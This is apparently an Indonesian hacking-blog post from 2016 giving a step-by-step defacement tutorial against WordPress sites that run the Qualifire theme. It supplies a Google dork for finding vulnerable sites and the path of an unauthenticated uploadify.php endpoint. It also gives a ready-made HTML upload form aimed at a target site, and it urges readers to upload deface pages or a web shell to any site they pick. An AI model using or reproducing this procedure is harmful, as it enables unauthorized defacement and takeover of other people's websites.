Kamis, 29 Desember 2016

Deface Wp-Themes Qualifire File Upload

Dork :
   inurl:"/wp-content/themes/qualifire"
(Kembangkan Lagi Cok !)

Exploit :  /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php

1. Masukan Dork Di Atas Ke GOOGLE (Search Enginer)

2. Cari Websites Target , Mana Aja Terserah Luh !
3. Tambahin Url Websites Menjadi
website.com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
Jika Vuln TampilanNya BLANK PUTIH Atau Muncul Angka Gajelas Kyk Muka Lu :v

4. Copy Script SCRF Di Bawah Ini , Simpan Dengan Ex.HTML (Contoh.html)

<form
action="http://www.target.co.li/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
</form>

Ganti http://www.target.co.il/ Dengan Website Target Luh!

5. Buka FILES CSRF Yang Tadi Lu Simpen , Lalu Upload GAMBAR (.jpg , .jpeg , .gif) Atau Kalau Bisa Script Deface Kalian (.html , .htm)
" KALAU KALIAN BISA UPLOAD SHELL YA ALHAMDULILLAH :v "
Maka Akan Nampak Seperti Ini :

6. Dan Lihat HasilNya.... www.TARGET.co.il/NamaFile.   (html/htm   jpg/jpeg/gif)

0 komentar

Posting Komentar